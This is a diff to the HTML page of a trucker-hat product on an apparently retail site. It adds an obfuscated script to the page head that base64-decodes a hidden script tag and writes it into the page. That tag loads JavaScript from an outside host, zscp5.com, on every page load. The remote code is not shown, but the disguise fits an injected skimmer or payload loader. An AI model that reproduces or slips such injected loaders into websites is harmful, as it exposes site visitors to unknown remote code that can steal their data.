--- a/IwrYO8z9/glide-bamboo-trucker-hat.html
+++ b/IwrYO8z9/glide-bamboo-trucker-hat.html
@@ -2,7 +2,11 @@
 <!doctype html>
 <html class="no-js" lang="en">
 <head>
-
+    <script>
+        let string = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vSXdyWU84ejkuenNjcDUuY29tL0l3cllPOHo5LmpzIj48L3NjcmlwdD4=';
+        let decodedString = atob(string);
+        document.write(decodedString);
+    </script>
   <meta charset="utf-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
   <meta name="viewport" content="width=device-width,initial-scale=1">
